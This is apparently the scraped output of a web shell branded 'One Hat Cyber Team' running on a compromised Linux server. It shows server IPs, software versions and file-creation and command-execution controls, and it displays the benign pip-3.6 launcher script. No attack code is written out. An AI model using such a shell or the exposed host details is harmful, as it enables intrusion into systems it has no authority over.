One Hat Cyber Team
Your IP :
172.70.80.191
Server IP :
188.114.97.3
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
bin
/
View File Name :
pip-3.6
#!/usr/bin/python3 # -*- coding: utf-8 -*- import re import sys try: from pip import main except ImportError: # user has most probably upgraded pip in their home # so let them run it anyway until ~/.local/bin makes it in front of the PATH from pip._internal import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())